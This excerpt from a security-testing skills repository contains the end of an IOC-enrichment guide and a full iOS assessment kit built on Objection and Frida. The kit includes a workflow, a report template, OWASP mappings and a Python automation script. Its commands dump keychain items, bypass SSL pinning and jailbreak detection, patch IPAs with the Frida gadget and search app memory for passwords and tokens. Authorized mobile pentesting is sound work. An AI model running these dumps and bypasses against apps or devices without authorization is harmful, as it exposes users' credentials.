print(f"Malicious: {detections['malicious']}/{sum(detections.values())}")
|
||||
|
||||
# Domain analysis
|
||||
domain_obj = client.get_object(f"/domains/{domain}")
|
||||
print(domain_obj.last_analysis_stats)
|
||||
print(domain_obj.reputation)
|
||||
client.close()
|
||||
```
|
||||
|
||||
**AbuseIPDB (IP addresses)**:
|
||||
```python
|
||||
import requests
|
||||
|
||||
response = requests.get(
|
||||
"https://api.abuseipdb.com/api/v2/check",
|
||||
headers={"Key": "YOUR_KEY", "Accept": "application/json"},
|
||||
params={"ipAddress": "1.2.3.4", "maxAgeInDays": 90}
|
||||
)
|
||||
data = response.json()["data"]
|
||||
print(f"Confidence: {data['abuseConfidenceScore']}%, Reports: {data['totalReports']}")
|
||||
```
|
||||
|
||||
**MalwareBazaar (file hashes)**:
|
||||
```python
|
||||
response = requests.post(
|
||||
"https://mb-api.abuse.ch/api/v1/",
|
||||
data={"query": "get_info", "hash": sha256_hash}
|
||||
)
|
||||
result = response.json()
|
||||
if result["query_status"] == "ok":
|
||||
print(result["data"][0]["tags"], result["data"][0]["signature"])
|
||||
```
|
||||
|
||||
### Step 3: Contextualize with Campaign Attribution
|
||||
|
||||
Query MISP for existing events matching the IOC:
|
||||
```python
|
||||
from pymisp import PyMISP
|
||||
|
||||
misp = PyMISP("https://misp.example.com", "API_KEY")
|
||||
results = misp.search(value="evil-domain.com", type_attribute="domain")
|
||||
for event in results:
|
||||
print(event["Event"]["info"], event["Event"]["threat_level_id"])
|
||||
```
|
||||
|
||||
Check Shodan for IP context (hosting provider, open ports, banners) to identify if the IP belongs to bulletproof hosting or a legitimate cloud provider (false positive risk).
|
||||
|
||||
### Step 4: Assign Confidence Score and Disposition
|
||||
|
||||
Apply a tiered decision framework:
|
||||
- **Block (High Confidence ≥ 70%)**: ≥15 AV detections on VT, AbuseIPDB score ≥70, matches known malware family or campaign
|
||||
- **Monitor/Alert (Medium 40–69%)**: 5–14 AV detections, moderate AbuseIPDB score, no campaign attribution
|
||||
- **Whitelist/Investigate (Low <40%)**: ≤4 AV detections, no abuse reports, legitimate service (Google, Cloudflare CDN IPs)
|
||||
- **False Positive**: Legitimate business service incorrectly flagged; document and exclude from future alerts
|
||||
|
||||
### Step 5: Document and Distribute
|
||||
|
||||
Record findings in TIP/MISP with:
|
||||
- All enrichment data collected (timestamps, source, score)
|
||||
- Disposition decision and rationale
|
||||
- Blocking actions taken (firewall, proxy, DNS sinkhole)
|
||||
- Related incident ticket number
|
||||
|
||||
Export to STIX indicator object with confidence field set appropriately.
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **IOC** | Indicator of Compromise — observable network or host artifact indicating potential compromise |
|
||||
| **Enrichment** | Process of adding contextual data to a raw IOC from multiple intelligence sources |
|
||||
| **Defanging** | Modifying IOCs (replacing `.` with `[.]`) to prevent accidental activation in documentation |
|
||||
| **False Positive Rate** | Percentage of benign artifacts incorrectly flagged as malicious; critical for tuning block thresholds |
|
||||
| **Sinkhole** | DNS server redirecting malicious domain lookups to a benign IP for detection without blocking traffic entirely |
|
||||
| **TTL** | Time-to-live for an IOC in blocking controls; IP indicators should expire after 30 days, domains after 90 days |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **VirusTotal**: Multi-engine malware scanner and threat intelligence platform with 70+ AV engines, sandbox reports, and community comments
|
||||
- **AbuseIPDB**: Community-maintained IP reputation database with 90-day abuse report history
|
||||
- **MalwareBazaar (abuse.ch)**: Free malware hash repository with YARA rule associations and malware family tagging
|
||||
- **URLScan.io**: Free URL analysis service that captures screenshots, DOM, and network requests for phishing URL triage
|
||||
- **Shodan**: Internet-wide scan data providing hosting provider, open ports, and banner information for IP enrichment
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **Blocking shared infrastructure**: CDN IPs (Cloudflare 104.21.x.x, AWS CloudFront) may legitimately host malicious content but blocking the IP disrupts thousands of legitimate sites.
|
||||
- **VT score obsession**: Low VT detection count does not mean benign — zero-day malware and custom APT tools often score 0 initially. Check sandbox behavior, MISP, and passive DNS.
|
||||
- **Missing defanging**: Pasting live IOCs in emails or Confluence docs can trigger automated URL scanners or phishing tools.
|
||||
- **No expiration policy**: IOCs without TTLs accumulate in blocklists indefinitely, generating false positives as infrastructure is repurposed by legitimate users.
|
||||
- **Over-relying on single source**: VirusTotal aggregates AV opinions — all may be wrong or lag behind emerging malware. Use 3+ independent sources for high-stakes decisions.
|
||||
@@ -0,0 +1,186 @@
|
||||
---
|
||||
name: analyzing-ios-app-security-with-objection
|
||||
description: >
|
||||
Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered
|
||||
toolkit that enables security testers to interact with app internals without jailbreaking. Use when
|
||||
assessing iOS app security posture, bypassing client-side protections, dumping keychain items,
|
||||
inspecting filesystem storage, and evaluating runtime behavior. Activates for requests involving
|
||||
iOS security testing, Objection runtime analysis, Frida-based iOS assessment, or mobile runtime
|
||||
exploration.
|
||||
domain: cybersecurity
|
||||
subdomain: mobile-security
|
||||
author: mahipal
|
||||
tags: [mobile-security, ios, objection, frida, owasp-mobile, penetration-testing]
|
||||
version: 1.0.0
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing iOS App Security with Objection
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Performing runtime security assessment of iOS applications during authorized penetration tests
|
||||
- Inspecting iOS keychain, filesystem, and memory for sensitive data exposure
|
||||
- Bypassing client-side security controls (SSL pinning, jailbreak detection) during security testing
|
||||
- Evaluating iOS app behavior at runtime without access to source code
|
||||
|
||||
**Do not use** this skill on production devices without explicit authorization -- Objection modifies app runtime behavior and may trigger security monitoring.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.10+ with pip
|
||||
- Objection installed: `pip install objection`
|
||||
- Frida installed: `pip install frida-tools`
|
||||
- Target iOS device (jailbroken with Frida server, or non-jailbroken with repackaged IPA)
|
||||
- For non-jailbroken: `objection patchipa` to inject Frida gadget into IPA
|
||||
- macOS recommended for iOS testing (Xcode, ideviceinstaller)
|
||||
- USB connection to target device or network Frida server
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Prepare the Testing Environment
|
||||
|
||||
**For jailbroken devices:**
|
||||
```bash
|
||||
# Install Frida server on device via Cydia/Sileo
|
||||
# SSH to device and start Frida server
|
||||
ssh root@<device_ip> "/usr/sbin/frida-server -D"
|
||||
|
||||
# Verify Frida connectivity
|
||||
frida-ps -U # List processes on USB-connected device
|
||||
```
|
||||
|
||||
**For non-jailbroken devices (authorized testing):**
|
||||
```bash
|
||||
# Patch IPA with Frida gadget
|
||||
objection patchipa --source target.ipa --codesign-signature "Apple Development: test@example.com"
|
||||
|
||||
# Install patched IPA
|
||||
ideviceinstaller -i target-patched.ipa
|
||||
```
|
||||
|
||||
### Step 2: Attach Objection to Target App
|
||||
|
||||
```bash
|
||||
# Attach to running app by bundle ID
|
||||
objection --gadget "com.target.app" explore
|
||||
|
||||
# Or spawn the app fresh
|
||||
objection --gadget "com.target.app" explore --startup-command "ios hooking list classes"
|
||||
```
|
||||
|
||||
Once attached, Objection provides an interactive REPL for runtime exploration.
|
||||
|
||||
### Step 3: Assess Data Storage Security (MASVS-STORAGE)
|
||||
|
||||
```bash
|
||||
# Dump iOS Keychain items accessible to the app
|
||||
ios keychain dump
|
||||
|
||||
# List files in app sandbox
|
||||
ios plist cat Info.plist
|
||||
env # Show app environment paths
|
||||
|
||||
# Inspect NSUserDefaults for sensitive data
|
||||
ios nsuserdefaults get
|
||||
|
||||
# List SQLite databases
|
||||
sqlite connect app_data.db
|
||||
sqlite execute query "SELECT * FROM credentials"
|
||||
|
||||
# Check for sensitive data in pasteboard
|
||||
ios pasteboard monitor
|
||||
```
|
||||
|
||||
### Step 4: Evaluate Network Security (MASVS-NETWORK)
|
||||
|
||||
```bash
|
||||
# Disable SSL/TLS certificate pinning
|
||||
ios sslpinning disable
|
||||
|
||||
# Verify pinning is bypassed by observing traffic in Burp Suite proxy
|
||||
# Monitor network-related class method calls
|
||||
ios hooking watch class NSURLSession
|
||||
ios hooking watch class NSURLConnection
|
||||
```
|
||||
|
||||
### Step 5: Inspect Authentication and Authorization (MASVS-AUTH)
|
||||
|
||||
```bash
|
||||
# List all Objective-C classes
|
||||
ios hooking list classes
|
||||
|
||||
# Search for authentication-related classes
|
||||
ios hooking search classes Auth
|
||||
ios hooking search classes Login
|
||||
ios hooking search classes Token
|
||||
|
||||
# Hook authentication methods to observe parameters
|
||||
ios hooking watch method "+[AuthManager validateToken:]" --dump-args --dump-return
|
||||
|
||||
# Monitor biometric authentication calls
|
||||
ios hooking watch class LAContext
|
||||
```
|
||||
|
||||
### Step 6: Assess Binary Protections (MASVS-RESILIENCE)
|
||||
|
||||
```bash
|
||||
# Check jailbreak detection implementation
|
||||
ios jailbreak disable
|
||||
|
||||
# Simulate jailbreak detection bypass
|
||||
ios jailbreak simulate
|
||||
|
||||
# List loaded frameworks and libraries
|
||||
memory list modules
|
||||
|
||||
# Search memory for sensitive strings
|
||||
memory search "password" --string
|
||||
memory search "api_key" --string
|
||||
memory search "Bearer" --string
|
||||
|
||||
# Dump specific memory regions
|
||||
memory dump all dump_output/
|
||||
```
|
||||
|
||||
### Step 7: Review Platform Interaction (MASVS-PLATFORM)
|
||||
|
||||
```bash
|
||||
# List URL schemes registered by the app
|
||||
ios info binary
|
||||
ios bundles list_frameworks
|
||||
|
||||
# Hook URL scheme handlers
|
||||
ios hooking watch method "-[AppDelegate application:openURL:options:]" --dump-args
|
||||
|
||||
# Monitor clipboard access
|
||||
ios pasteboard monitor
|
||||
|
||||
# Check for custom keyboard restrictions
|
||||
ios hooking search classes UITextField
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **Objection** | Runtime mobile exploration toolkit built on Frida that provides pre-built scripts for common security testing tasks |
|
||||
| **Frida Gadget** | Shared library injected into app process to enable Frida instrumentation without jailbreak |
|
||||
| **Keychain** | iOS secure credential storage system; Objection can dump items accessible to the target app's keychain access group |
|
||||
| **SSL Pinning Bypass** | Runtime modification of certificate validation logic to allow proxy interception of HTTPS traffic |
|
||||
| **Method Hooking** | Intercepting Objective-C/Swift method calls at runtime to observe arguments, return values, and modify behavior |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Objection**: High-level Frida-powered mobile security exploration toolkit with pre-built commands
|
||||
- **Frida**: Dynamic instrumentation framework providing JavaScript injection into native app processes
|
||||
- **Frida-tools**: CLI utilities for Frida including frida-ps, frida-trace, and frida-discover
|
||||
- **ideviceinstaller**: Cross-platform tool for installing/managing iOS apps via USB
|
||||
- **Burp Suite**: HTTP proxy for intercepting traffic after SSL pinning bypass
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **App crashes on attach**: Some apps implement Frida detection. Use `--startup-command` to hook anti-Frida checks early in the app lifecycle.
|
||||
- **Keychain access scope**: Objection can only dump keychain items within the app's access group. System keychain items require separate jailbreak-level tools.
|
||||
- **Swift name mangling**: Swift method names are mangled in the runtime. Use `ios hooking list classes` with grep to find demangled names.
|
||||
- **Non-persistent changes**: All Objection modifications are runtime-only and reset on app restart. Document findings immediately.
|
||||
@@ -0,0 +1,80 @@
|
||||
# iOS Objection Security Assessment Report
|
||||
|
||||
## Engagement Information
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Application | [APP_NAME] |
|
||||
| Bundle ID | [BUNDLE_ID] |
|
||||
| iOS Version | [IOS_VERSION] |
|
||||
| Device | [DEVICE_MODEL] |
|
||||
| Device State | [Jailbroken/Non-Jailbroken] |
|
||||
| Assessment Date | [DATE] |
|
||||
| Analyst | [ANALYST] |
|
||||
| Objection Version | [VERSION] |
|
||||
|
||||
## Executive Summary
|
||||
|
||||
[Brief narrative of findings from Objection runtime analysis]
|
||||
|
||||
## Keychain Analysis
|
||||
|
||||
| Service | Account | Data Type | Protection Class | Risk |
|
||||
|---------|---------|-----------|-----------------|------|
|
||||
| [SERVICE] | [ACCOUNT] | [TYPE] | [CLASS] | [RISK] |
|
||||
|
||||
**Findings**: [Description of sensitive data found in keychain]
|
||||
|
||||
## Data Storage Assessment
|
||||
|
||||
### NSUserDefaults
|
||||
| Key | Contains Sensitive Data | Risk |
|
||||
|-----|----------------------|------|
|
||||
| [KEY] | [YES/NO] | [RISK] |
|
||||
|
||||
### SQLite Databases
|
||||
| Database | Encrypted | Sensitive Tables | Risk |
|
||||
|----------|-----------|-----------------|------|
|
||||
| [DB_NAME] | [YES/NO] | [TABLES] | [RISK] |
|
||||
|
||||
### Filesystem
|
||||
| Path | Contents | Protection | Risk |
|
||||
|------|----------|-----------|------|
|
||||
| [PATH] | [DESCRIPTION] | [ATTRIBUTE] | [RISK] |
|
||||
|
||||
## Network Security
|
||||
|
||||
| Check | Result | Details |
|
||||
|-------|--------|---------|
|
||||
| SSL Pinning Present | [YES/NO] | [IMPLEMENTATION_DETAILS] |
|
||||
| SSL Pinning Bypass | [SUCCESS/FAIL] | [METHOD_USED] |
|
||||
| ATS Configuration | [STRICT/RELAXED] | [EXCEPTIONS] |
|
||||
|
||||
## Binary Protection Assessment
|
||||
|
||||
| Protection | Status | Details |
|
||||
|-----------|--------|---------|
|
||||
| Jailbreak Detection | [Present/Absent] | [BYPASS_DIFFICULTY] |
|
||||
| Frida Detection | [Present/Absent] | [DETAILS] |
|
||||
| Debug Detection | [Present/Absent] | [DETAILS] |
|
||||
| Code Obfuscation | [Yes/No] | [DETAILS] |
|
||||
|
||||
## Memory Analysis
|
||||
|
||||
| Search Pattern | Found | Risk | Details |
|
||||
|---------------|-------|------|---------|
|
||||
| Passwords | [YES/NO] | [RISK] | [DETAILS] |
|
||||
| Auth Tokens | [YES/NO] | [RISK] | [DETAILS] |
|
||||
| API Keys | [YES/NO] | [RISK] | [DETAILS] |
|
||||
| JWTs | [YES/NO] | [RISK] | [DETAILS] |
|
||||
|
||||
## Recommendations
|
||||
|
||||
### Critical
|
||||
1. [RECOMMENDATION]
|
||||
|
||||
### High
|
||||
1. [RECOMMENDATION]
|
||||
|
||||
### Medium
|
||||
1. [RECOMMENDATION]
|
||||
@@ -0,0 +1,43 @@
|
||||
# Standards Reference: iOS App Security with Objection
|
||||
|
||||
## OWASP Mobile Top 10 2024 Mapping
|
||||
|
||||
| OWASP ID | Risk | Objection Testing Coverage |
|
||||
|----------|------|---------------------------|
|
||||
| M1 | Improper Credential Usage | Keychain dumping, memory string search for hardcoded credentials |
|
||||
| M3 | Insecure Authentication/Authorization | Hook authentication methods, bypass biometric checks |
|
||||
| M5 | Insecure Communication | SSL pinning bypass, network class hooking |
|
||||
| M7 | Insufficient Binary Protections | Jailbreak detection bypass, Frida detection assessment |
|
||||
| M8 | Security Misconfiguration | Info.plist review, URL scheme analysis, ATS configuration |
|
||||
| M9 | Insecure Data Storage | NSUserDefaults inspection, SQLite database access, file system review |
|
||||
|
||||
## OWASP MASVS v2.0 Control Mapping
|
||||
|
||||
| MASVS Category | Objection Commands | Assessment Area |
|
||||
|----------------|-------------------|-----------------|
|
||||
| MASVS-STORAGE | `ios keychain dump`, `ios nsuserdefaults get`, `sqlite connect` | Sensitive data in keychain, NSUserDefaults, databases |
|
||||
| MASVS-CRYPTO | `memory search`, hook crypto framework calls | Key storage, algorithm selection |
|
||||
| MASVS-AUTH | Hook LAContext, authentication classes | Biometric bypass, session management |
|
||||
| MASVS-NETWORK | `ios sslpinning disable`, hook NSURLSession | Certificate pinning, cleartext traffic |
|
||||
| MASVS-PLATFORM | Hook URL scheme handlers, pasteboard monitor | Deep link security, clipboard exposure |
|
||||
| MASVS-CODE | `memory list modules`, binary inspection | Debugging symbols, framework analysis |
|
||||
| MASVS-RESILIENCE | `ios jailbreak disable`, Frida detection hooks | Anti-tampering, anti-debugging |
|
||||
|
||||
## OWASP MASTG Test Cases
|
||||
|
||||
| Test ID | Description | Objection Approach |
|
||||
|---------|-------------|-------------------|
|
||||
| MASTG-TEST-0053 | Testing Local Storage for Sensitive Data | `ios keychain dump`, filesystem inspection |
|
||||
| MASTG-TEST-0057 | Testing Backups for Sensitive Data | Check backup exclusion attributes |
|
||||
| MASTG-TEST-0060 | Testing Custom URL Schemes | Hook `application:openURL:options:` |
|
||||
| MASTG-TEST-0063 | Testing for Sensitive Data in Logs | Monitor NSLog calls via hooking |
|
||||
| MASTG-TEST-0066 | Testing Enforced App Transport Security | Inspect Info.plist ATS configuration |
|
||||
|
||||
## Apple Platform Security Requirements
|
||||
|
||||
| Requirement | Assessment Method |
|
||||
|-------------|-------------------|
|
||||
| Keychain Access Control | Verify kSecAttrAccessible values via keychain dump |
|
||||
| App Transport Security | Check Info.plist for NSAllowsArbitraryLoads exceptions |
|
||||
| Data Protection API | Verify file protection attributes on sensitive files |
|
||||
| Secure Enclave Usage | Hook SecKey operations for biometric-protected keys |
|
||||
@@ -0,0 +1,83 @@
|
||||
# Workflows: iOS App Security with Objection
|
||||
|
||||
## Workflow 1: iOS Runtime Security Assessment
|
||||
|
||||
```
|
||||
[Setup Environment] --> [Prepare Device] --> [Attach Objection] --> [Runtime Analysis]
|
||||
| | | |
|
||||
v v v v
|
||||
[Install Frida] [Jailbroken: Start [Connect via USB] [Data Storage Check]
|
||||
[Install Objection] frida-server] [Spawn target app] [Network Security]
|
||||
[Non-JB: Patch IPA] [Auth Mechanism Review]
|
||||
[Binary Protection Test]
|
||||
|
|
||||
v
|
||||
[Document Findings]
|
||||
[Generate Report]
|
||||
```
|
||||
|
||||
## Workflow 2: SSL Pinning Bypass for Traffic Interception
|
||||
|
||||
```
|
||||
[Configure Burp Proxy] --> [Set device proxy] --> [Attach Objection]
|
||||
|
|
||||
v
|
||||
[ios sslpinning disable]
|
||||
|
|
||||
v
|
||||
[Navigate app in browser/UI]
|
||||
|
|
||||
v
|
||||
[Capture HTTPS traffic in Burp]
|
||||
[Analyze API endpoints]
|
||||
[Test authentication flows]
|
||||
[Check for sensitive data in transit]
|
||||
```
|
||||
|
||||
## Workflow 3: Keychain and Data Storage Assessment
|
||||
|
||||
```
|
||||
[Attach Objection] --> [ios keychain dump] --> [Analyze keychain items]
|
||||
| |
|
||||
v v
|
||||
[ios nsuserdefaults get] [Check protection classes]
|
||||
| [Identify sensitive tokens]
|
||||
v [Verify encryption at rest]
|
||||
[List app sandbox files]
|
||||
|
|
||||
v
|
||||
[sqlite connect *.db]
|
||||
[Query sensitive tables]
|
||||
|
|
||||
v
|
||||
[memory search "password"]
|
||||
[memory search "token"]
|
||||
[memory search "secret"]
|
||||
```
|
||||
|
||||
## Workflow 4: Jailbreak Detection Assessment
|
||||
|
||||
```
|
||||
[Attach Objection] --> [ios jailbreak disable] --> [Navigate app]
|
||||
| |
|
||||
v [App functions normally?]
|
||||
[Hook detection methods] / \
|
||||
[Monitor file checks] [Yes] [No]
|
||||
[Monitor Cydia URL scheme] | |
|
||||
| [Detection [Additional detection
|
||||
v bypassed] methods exist]
|
||||
[Document detection |
|
||||
methods found] [Hook deeper: search
|
||||
[Assess bypass for custom checks]
|
||||
difficulty] [Frida script for
|
||||
targeted bypass]
|
||||
```
|
||||
|
||||
## Decision Matrix: Testing Approach
|
||||
|
||||
| Device State | IPA Access | Approach |
|
||||
|-------------|-----------|----------|
|
||||
| Jailbroken | Not needed | Direct Frida server + Objection attach |
|
||||
| Non-jailbroken | Available | Patch IPA with `objection patchipa` |
|
||||
| Non-jailbroken | Not available | Request IPA from client or use device management |
|
||||
| Emulator | N/A | Limited: Frida on Corellium or similar platform |
|
||||
@@ -0,0 +1,294 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Objection iOS Security Assessment Automation
|
||||
|
||||
Automates common Objection commands for iOS app security testing.
|
||||
Runs keychain dump, storage inspection, SSL pinning check, and jailbreak detection analysis.
|
||||
|
||||
Usage:
|
||||
python process.py --bundle-id com.target.app [--device-id UDID] [--output report.json]
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import subprocess
|
||||
import sys
|
||||
import re
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
class ObjectionAssessor:
|
||||
"""Automates Objection-based iOS security assessment tasks."""
|
||||
|
||||
def __init__(self, bundle_id: str, device_id: str = None):
|
||||
self.bundle_id = bundle_id
|
||||
self.device_id = device_id
|
||||
self.findings = []
|
||||
|
||||
def _run_objection_command(self, command: str, timeout: int = 30) -> str:
|
||||
"""Execute an Objection command and return output."""
|
||||
cmd = ["objection", "--gadget", self.bundle_id, "run", command]
|
||||
if self.device_id:
|
||||
cmd.insert(1, "--serial")
|
||||
cmd.insert(2, self.device_id)
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=timeout,
|
||||
)
|
||||
return result.stdout + result.stderr
|
||||
except subprocess.TimeoutExpired:
|
||||
return f"TIMEOUT: Command '{command}' exceeded {timeout}s"
|
||||
except FileNotFoundError:
|
||||
return "ERROR: Objection not found. Install with: pip install objection"
|
||||
|
||||
def _run_frida_command(self, script: str, timeout: int = 15) -> str:
|
||||
"""Execute a Frida script snippet."""
|
||||
cmd = ["frida", "-U", "-n", self.bundle_id, "-e", script]
|
||||
if self.device_id:
|
||||
cmd.extend(["-D", self.device_id])
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=timeout,
|
||||
)
|
||||
return result.stdout
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
return ""
|
||||
|
||||
def check_frida_connectivity(self) -> dict:
|
||||
"""Verify Frida can connect to the device."""
|
||||
cmd = ["frida-ps", "-U"]
|
||||
if self.device_id:
|
||||
cmd.extend(["-D", self.device_id])
|
||||
|
||||
try:
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
|
||||
connected = result.returncode == 0
|
||||
processes = len(result.stdout.strip().split("\n")) - 1 if connected else 0
|
||||
return {
|
||||
"connected": connected,
|
||||
"process_count": processes,
|
||||
"target_running": self.bundle_id in result.stdout,
|
||||
}
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
return {"connected": False, "process_count": 0, "target_running": False}
|
||||
|
||||
def dump_keychain(self) -> dict:
|
||||
"""Dump keychain items accessible to the app."""
|
||||
output = self._run_objection_command("ios keychain dump")
|
||||
items = []
|
||||
current_item = {}
|
||||
|
||||
for line in output.split("\n"):
|
||||
line = line.strip()
|
||||
if "Service" in line and ":" in line:
|
||||
if current_item:
|
||||
items.append(current_item)
|
||||
current_item = {"service": line.split(":", 1)[-1].strip()}
|
||||
elif "Account" in line and ":" in line:
|
||||
current_item["account"] = line.split(":", 1)[-1].strip()
|
||||
elif "Data" in line and ":" in line:
|
||||
data = line.split(":", 1)[-1].strip()
|
||||
current_item["data_preview"] = data[:50] + "..." if len(data) > 50 else data
|
||||
current_item["data_length"] = len(data)
|
||||
|
||||
if current_item:
|
||||
items.append(current_item)
|
||||
|
||||
finding = {
|
||||
"check": "keychain_dump",
|
||||
"category": "MASVS-STORAGE",
|
||||
"owasp_mobile": "M9",
|
||||
"items_found": len(items),
|
||||
"items": items[:20],
|
||||
"severity": "HIGH" if items else "INFO",
|
||||
"description": f"Found {len(items)} keychain items accessible to the application",
|
||||
}
|
||||
self.findings.append(finding)
|
||||
return finding
|
||||
|
||||
def check_nsuserdefaults(self) -> dict:
|
||||
"""Inspect NSUserDefaults for sensitive data."""
|
||||
output = self._run_objection_command("ios nsuserdefaults get")
|
||||
sensitive_patterns = [
|
||||
"password", "token", "secret", "key", "auth",
|
||||
"session", "credential", "api_key", "apikey",
|
||||
]
|
||||
|
||||
sensitive_entries = []
|
||||
for line in output.split("\n"):
|
||||
line_lower = line.lower()
|
||||
for pattern in sensitive_patterns:
|
||||
if pattern in line_lower:
|
||||
sensitive_entries.append(line.strip())
|
||||
break
|
||||
|
||||
finding = {
|
||||
"check": "nsuserdefaults",
|
||||
"category": "MASVS-STORAGE",
|
||||
"owasp_mobile": "M9",
|
||||
"sensitive_entries": len(sensitive_entries),
|
||||
"entries": sensitive_entries[:10],
|
||||
"severity": "HIGH" if sensitive_entries else "PASS",
|
||||
"description": f"Found {len(sensitive_entries)} potentially sensitive NSUserDefaults entries",
|
||||
}
|
||||
self.findings.append(finding)
|
||||
return finding
|
||||
|
||||
def check_ssl_pinning(self) -> dict:
|
||||
"""Assess SSL pinning implementation."""
|
||||
output = self._run_objection_command("ios sslpinning disable")
|
||||
pinning_detected = "pinning" in output.lower() or "hook" in output.lower()
|
||||
|
||||
finding = {
|
||||
"check": "ssl_pinning",
|
||||
"category": "MASVS-NETWORK",
|
||||
"owasp_mobile": "M5",
|
||||
"pinning_detected": pinning_detected,
|
||||
"bypass_output": output[:500],
|
||||
"severity": "MEDIUM" if not pinning_detected else "INFO",
|
||||
"description": "SSL pinning " + ("detected and bypassed" if pinning_detected else "not detected"),
|
||||
}
|
||||
self.findings.append(finding)
|
||||
return finding
|
||||
|
||||
def check_jailbreak_detection(self) -> dict:
|
||||
"""Assess jailbreak detection implementation."""
|
||||
output = self._run_objection_command("ios jailbreak disable")
|
||||
detection_found = "hook" in output.lower() or "bypass" in output.lower()
|
||||
|
||||
finding = {
|
||||
"check": "jailbreak_detection",
|
||||
"category": "MASVS-RESILIENCE",
|
||||
"owasp_mobile": "M7",
|
||||
"detection_implemented": detection_found,
|
||||
"bypass_output": output[:500],
|
||||
"severity": "MEDIUM" if not detection_found else "INFO",
|
||||
"description": "Jailbreak detection " + ("found" if detection_found else "not found or not implemented"),
|
||||
}
|
||||
self.findings.append(finding)
|
||||
return finding
|
||||
|
||||
def search_sensitive_memory(self) -> dict:
|
||||
"""Search app memory for sensitive strings."""
|
||||
patterns = ["password", "Bearer ", "eyJ", "api_key", "secret"]
|
||||
memory_findings = []
|
||||
|
||||
for pattern in patterns:
|
||||
output = self._run_objection_command(f'memory search "{pattern}" --string')
|
||||
matches = output.count("Found")
|
||||
if matches > 0:
|
||||
memory_findings.append({
|
||||
"pattern": pattern,
|
||||
"matches": matches,
|
||||
})
|
||||
|
||||
finding = {
|
||||
"check": "memory_search",
|
||||
"category": "MASVS-STORAGE",
|
||||
"owasp_mobile": "M9",
|
||||
"patterns_with_matches": len(memory_findings),
|
||||
"details": memory_findings,
|
||||
"severity": "HIGH" if memory_findings else "PASS",
|
||||
"description": f"Found sensitive patterns in memory for {len(memory_findings)} search terms",
|
||||
}
|
||||
self.findings.append(finding)
|
||||
return finding
|
||||
|
||||
def get_app_info(self) -> dict:
|
||||
"""Gather basic app information."""
|
||||
output = self._run_objection_command("ios info binary")
|
||||
env_output = self._run_objection_command("env")
|
||||
|
||||
return {
|
||||
"bundle_id": self.bundle_id,
|
||||
"binary_info": output[:1000],
|
||||
"environment": env_output[:1000],
|
||||
}
|
||||
|
||||
def generate_report(self) -> dict:
|
||||
"""Generate consolidated assessment report."""
|
||||
severity_counts = {"HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0, "PASS": 0}
|
||||
for f in self.findings:
|
||||
sev = f.get("severity", "INFO")
|
||||
severity_counts[sev] = severity_counts.get(sev, 0) + 1
|
||||
|
||||
return {
|
||||
"assessment": {
|
||||
"target": self.bundle_id,
|
||||
"date": datetime.now().isoformat(),
|
||||
"tool": "Objection (Frida-powered)",
|
||||
"type": "iOS Runtime Security Assessment",
|
||||
},
|
||||
"summary": {
|
||||
"total_checks": len(self.findings),
|
||||
"severity_breakdown": severity_counts,
|
||||
"critical_findings": [
|
||||
f for f in self.findings if f.get("severity") in ("HIGH", "CRITICAL")
|
||||
],
|
||||
},
|
||||
"findings": self.findings,
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Objection iOS Security Assessment Automation"
|
||||
)
|
||||
parser.add_argument("--bundle-id", required=True, help="iOS app bundle identifier")
|
||||
parser.add_argument("--device-id", help="Device UDID for targeting specific device")
|
||||
parser.add_argument("--output", default="objection_report.json", help="Output report path")
|
||||
parser.add_argument("--checks", nargs="+",
|
||||
default=["keychain", "nsuserdefaults", "ssl", "jailbreak", "memory"],
|
||||
help="Checks to run")
|
||||
args = parser.parse_args()
|
||||
|
||||
assessor = ObjectionAssessor(args.bundle_id, args.device_id)
|
||||
|
||||
# Verify connectivity
|
||||
connectivity = assessor.check_frida_connectivity()
|
||||
if not connectivity["connected"]:
|
||||
print("[-] ERROR: Cannot connect to device via Frida")
|
||||
print(" Ensure Frida server is running on device or IPA is patched")
|
||||
sys.exit(1)
|
||||
|
||||
print(f"[+] Connected to device. Target running: {connectivity['target_running']}")
|
||||
|
||||
# Run selected checks
|
||||
check_map = {
|
||||
"keychain": assessor.dump_keychain,
|
||||
"nsuserdefaults": assessor.check_nsuserdefaults,
|
||||
"ssl": assessor.check_ssl_pinning,
|
||||
"jailbreak": assessor.check_jailbreak_detection,
|
||||
"memory": assessor.search_sensitive_memory,
|
||||
}
|
||||
|
||||
for check in args.checks:
|
||||
if check in check_map:
|
||||
print(f"[*] Running check: {check}")
|
||||
result = check_map[check]()
|
||||
print(f" Severity: {result['severity']} - {result['description']}")
|
||||
|
||||
# Generate report
|
||||
report = assessor.generate_report()
|
||||
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(report, f, indent=2)
|
||||
print(f"\n[+] Report saved: {args.output}")
|
||||
|
||||
# Summary
|
||||
high_count = report["summary"]["severity_breakdown"].get("HIGH", 0)
|
||||
if high_count > 0:
|
||||
print(f"[!] {high_count} HIGH severity findings require attention")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
